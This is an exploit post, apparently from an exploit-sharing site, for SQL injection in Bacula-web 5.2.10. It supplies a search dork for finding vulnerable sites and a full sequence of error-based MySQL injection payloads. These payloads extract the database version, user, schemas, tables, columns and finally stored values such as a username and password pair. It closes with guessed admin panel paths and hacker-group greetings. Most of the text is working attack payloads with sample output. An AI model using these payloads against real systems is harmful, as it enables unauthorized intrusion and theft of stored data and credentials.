facebook facebook twitter rss

Bacula-web 5.2.10 Sql Injection Vulnerability

Author: isdo213 , Published: 08-10-2014
# Exploit Title :   Bacula-web 5.2.10  Sql Injection Vulnerability                 







# Discovered By : isdo213





# Vendor : http://www.bacula-web.org/





# Contact : https://www.facebook.com/exploiterdz











# Date : 2014-10-07











###############################################################################







# Dork : "jobid=" bacula-web









###############################################################################

# p0c :


# code: 'and(select 1 from(select count(*),concat((select (select concat(version(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)and'


This code will return something like this
code: Duplicate entry '5.5.32-0ubuntu0.12.10.1' for key 'group_key'


Then get the name of the database using the following code. All we need do is replace the version () from the previous query with database ()
code: 'and(select 1 from(select count(*),concat((select (select concat(database(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)and'

That will return something like this
Code: [Select]
Duplicate entry 'security' for key 'group_key'

So now we find out, the username used to connect to the database. For the User name when you get the name of the bank, except that we changed to the user ()
code: 'and(select 1 from(select count(*),concat((select (select concat(user(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)and'


Will return something like
code: Duplicate entry 'root@localhost' for key 'group_key'



Now, this is all good, but we can not stop here. It is now time to start looking for the most important details. :)

Let us first find out how many databases have the server. To do this, run the following code
code: 'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,count(schema_name),0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'


This will return output like the following, where 12 is the number of database
code: Duplicate entry '~12~1' for key 'group_key'



Now let's discover the names of these databases. This can be done by following injection. For the next name of the database only increase the first number in the first limit clause
code: 'and(select 1 from(select count(*),concat((select (select (select concat(schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'



That will produce an output similar to this
code: Duplicate entry 'information_schema~1' for key 'group_key'



When you find the target database, let's proceed.

The first thing we do is count the number of tables in it. No need to waste time with some empty database :) Let's inject the following (replace [DATABASE] with the name of the database you want to use. Either as a string or as hex)
code: 'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,count(table_name),0x7e) from information_schema.tables where table_schema=[DATABASE] limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'



This will display output like this, and four is the number of database tables.
Code: [Select]
Duplicate entry '~4~1' for key 'group_key'


Then we will find the name of the tables, which can be done by following injection
code: 'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=[DATABASE] limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'


Again to get the next table name increase the first number in the first limit clause

Returned something like this.
code: Duplicate entry '~emails~1' for key 'group_key'

Duplicate entry

When we find an interesting table, we need to do what we did with the tables with columns.

So first we count the number of columns in the table. To do this, the following code inject
code: 'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,count(column_name),0x7e) from information_schema.columns where table_name=[TABLE NAME] limit 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)and'



Again to get the next column name to increase the first number in the first limit clause

Then returned something like this
code: Duplicate entry '~2~1' for key 'group_key'




Now we want to get the name of the columns that can be done by following injection
code: 'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e) from information_schema.columns where table_name=[TABLE NAME] limit 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)and'




Increase again .. the first number in the first limit clause to get the name of the next column!

If done correctly it will print something like
code: Duplicate entry '~id~1' for key 'group_key'




And finally, now that we've gotten this far, it's time to get important data: D

To obtain these values??, we inject the following (replace [column] with the column names found in the previous step)
code: 'and(select 1 from(select count(*),concat((select concat([COLUMN],0x3a,[COLUMN]) from [TABLE NAME] limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'




For the information of the next column, you first need to increase the number of limit clause: D

The output will be something like this.
Code: [Select]


Duplicate entry 'superman:genious1' for key 'group_key'


###############################################################################



#NOTE:
Be Unbreakable

Be Urself

Start

try to p0st ur idea

nothing can stop u

<3 peace <3


###############################################################################

My Youtube Chanel : https://www.youtube.com/user/th3isdo




# admin panel : www.site.com/admin

www.site.com/adm

www.site.com/wp-admin

www.site.com/cp





###############################################################################







# Greetz To : Me ( isdo213 ) =D ; The Least hacker ; Iq-Team ; Gaza-Hacker ; Younes fc Saw ; Mustapha hisso ; My l0ve .






<3 1.2.3 vive L'algerie <3




<3 Je t'aime bibichti <3


<3 I love Gaza <3



<3 peace <3



<3 Ouled Mimoun <3
<3 expl0t3r Dz isdo <3

<3

###############################################################################

Like us on Facebook :